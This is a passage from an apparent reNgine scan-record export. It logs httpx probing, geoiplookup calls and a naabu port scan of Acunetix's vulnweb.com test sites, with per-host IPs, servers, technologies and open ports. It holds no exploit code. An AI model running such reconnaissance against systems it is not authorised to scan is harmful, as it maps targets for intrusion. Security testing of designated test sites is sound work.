99Z\",\"url\":\"http://testaspx.vulnweb.com\",\"input\":\"testaspx.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.686763745Z\",\"url\":\"http://testhtml4.vulnweb.com\",\"input\":\"testhtml4.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.688528355Z\",\"url\":\"http://testephp.vulnweb.com\",\"input\":\"testephp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.702861487Z\",\"url\":\"http://testhtml6.vulnweb.com\",\"input\":\"testhtml6.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.708733377Z\",\"url\":\"http://testpho.vulnweb.com\",\"input\":\"testpho.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.709337326Z\",\"url\":\"http://testhtml7.vulnweb.com\",\"input\":\"testhtml7.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.709815943Z\",\"url\":\"http://testpgp.vulnweb.com\",\"input\":\"testpgp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.71392354Z\",\"url\":\"http://ttestphp.vulnweb.com\",\"input\":\"ttestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.715309355Z\",\"url\":\"http://testhtml8.vulnweb.com\",\"input\":\"testhtml8.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.721514531Z\",\"url\":\"http://tetphp.vulnweb.com\",\"input\":\"tetphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.722852005Z\",\"url\":\"http://testpphp.vulnweb.com\",\"input\":\"testpphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.730170539Z\",\"url\":\"http://u000erest.vulnweb.com\",\"input\":\"u000erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.72357903Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com\",\"input\":\"testasp.vulnweb.com\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"354.282472ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3539,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:19.75010086Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"347.114177ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:19.759642216Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com\",\"input\":\"testhtml5.vulnweb.com\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"352.482772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:19.918100652Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com\",\"input\":\"testaspnet.vulnweb.com\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"520.360558ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14066,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:20.121540502Z\",\"url\":\"http://www.testasp.vulnweb.com\",\"input\":\"www.testasp.vulnweb.com\",\"error\":\"no address found for host\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:20.178341153Z\",\"url\":\"http://www.testphp.vulnweb.com\",\"input\":\"www.testphp.vulnweb.com\",\"error\":\"no address found for host\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:29.898152128Z\",\"url\":\"http://u000etestasp.vulnweb.com\",\"input\":\"u000etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.010047774Z\",\"url\":\"http://u001erest.vulnweb.com\",\"input\":\"u001erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.020576159Z\",\"url\":\"http://u001etestasp.vulnweb.com\",\"input\":\"u001etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.020695111Z\",\"url\":\"http://u003erest.vulnweb.com\",\"input\":\"u003erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.021333789Z\",\"url\":\"http://u002erest.vulnweb.com\",\"input\":\"u002erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.021411423Z\",\"url\":\"http://u004erest.vulnweb.com\",\"input\":\"u004erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.025827795Z\",\"url\":\"http://u005etestasp.vulnweb.com\",\"input\":\"u005etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.026016312Z\",\"url\":\"http://u003etestasp.vulnweb.com\",\"input\":\"u003etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.028048087Z\",\"url\":\"http://u002etestasp.vulnweb.com\",\"input\":\"u002etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.028309043Z\",\"url\":\"http://u004etestasp.vulnweb.com\",\"input\":\"u004etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.036379924Z\",\"url\":\"http://u005erest.vulnweb.com\",\"input\":\"u005erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.036492322Z\",\"url\":\"http://u006erest.vulnweb.com\",\"input\":\"u006erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.03799062Z\",\"url\":\"http://u006etestasp.vulnweb.com\",\"input\":\"u006etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.048049728Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"344.256139ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:30.052494336Z\",\"url\":\"http://viruswall.vulnweb.com\",\"input\":\"viruswall.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.054953187Z\",\"url\":\"http://virus.vulnweb.com\",\"input\":\"virus.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.055243899Z\",\"url\":\"http://www.test.php.vulnweb.com\",\"input\":\"www.test.php.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.061332574Z\",\"url\":\"http://www.virus.vulnweb.com\",\"input\":\"www.virus.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.072062451Z\",\"url\":\"http://yxraaderrick.vulnweb.com\",\"input\":\"yxraaderrick.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:30.086753482Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com\",\"input\":\"www.vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"351.433339ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n", + "time": "2024-11-13T02:06:47.348Z" + } +}, +{ + "model": "startScan.command", + "pk": 34, + "fields": { + "scan_history": null, + "activity": null, + "command": "geoiplookup 18.215.71.186", + "return_code": null, + "output": null, + "time": "2024-11-13T02:07:19.682Z" + } +}, +{ + "model": "startScan.command", + "pk": 35, + "fields": { + "scan_history": null, + "activity": null, + "command": "geoiplookup 44.238.29.244", + "return_code": null, + "output": null, + "time": "2024-11-13T02:07:20.136Z" + } +}, +{ + "model": "startScan.command", + "pk": 36, + "fields": { + "scan_history": 1, + "activity": 3, + "command": "rm /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:07:30.352Z" + } +}, +{ + "model": "startScan.command", + "pk": 37, + "fields": { + "scan_history": 1, + "activity": 4, + "command": "naabu -json -exclude-cdn -list /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/input_subdomains_port_scan.txt -top-ports 100 -c 30 -rate 150 -timeout 5000 -silent", + "return_code": 0, + "output": "\n __\n ___ ___ ___ _/ / __ __\n / _ \\/ _ \\/ _ \\/ _ \\/ // /\n/_//_/\\_,_/\\_,_/_.__/\\_,_/\n\n\t\tprojectdiscovery.io\n\n[\u001b[34mINF\u001b[0m] Current naabu version 2.3.0 (\u001b[91moutdated\u001b[0m)\n{\"host\":\"rest.vulnweb.com\",\"ip\":\"18.215.71.186\",\"timestamp\":\"2024-11-13T02:07:36.199467056Z\",\"port\":8081,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"rest.vulnweb.com\",\"ip\":\"18.215.71.186\",\"timestamp\":\"2024-11-13T02:07:37.197660956Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testasp.vulnweb.com\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:07:41.273925699Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaspnet.vulnweb.com\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:07:41.273977109Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"0f-0fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277460973Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"0ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.27749776Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"10ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277506732Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"1f-1fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277511293Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"1ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277515627Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"2burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277520428Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277525803Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"2ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277532858Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"3burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277537194Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"3f-3fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277541661Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"3ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277545795Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"4burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277551478Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"4ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277556115Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"4f-4fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.27756091Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"4ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277565068Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-0dhttp-0a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277578515Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-1dhttp-1a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277583563Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-2dhttp-2a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277591125Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-0f-0fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277595451Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-1f-1fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277599537Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277603725Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-3f-3fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277608104Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-4f-4fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277618934Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-5f-5fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277628142Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-4dhttp-4a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277632946Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-5dhttp-5a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277637768Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-6dhttp-6a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277641897Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277647841Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277652024Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"6burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277656859Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"6ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277660893Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"7burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277686693Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"7ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277691534Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"8burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277697328Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"8ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277707026Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"9ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277736572Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus0.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277741433Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus1.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277745738Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus2.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277750352Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus3.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277754767Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus4.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.27775905Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"app.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277785848Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"arabatik.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277812886Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"aspnet.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277840159Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"blogger.com.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277844537Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"edu-rost.rutestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277848924Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"edu-rost.ruwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277853227Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"estphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277859343Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"gd.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277864204Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"htestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277868343Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"httestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277872965Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"httptestaspnet.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277877279Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"httptestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277882036Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"htttestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277905121Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"nmaptestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277909418Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"odincovo.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277913894Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"phptest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277918147Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"pingwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277922445Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"restasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277926923Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"test.php.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277932681Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testap.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277937348Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaps.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277941732Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testapsnet.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277947233Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaspx.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277951246Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testephp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277959168Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml2.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277963356Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml3.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277967364Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml4.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277971559Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml5.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277975496Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml6.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277979804Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml7.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277986223Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml8.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277990308Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testpgp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277994279Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testpho.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.277998512Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testpphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278002491Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"tetphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278008983Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u000erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278013097Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u000etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278017116Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u001erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-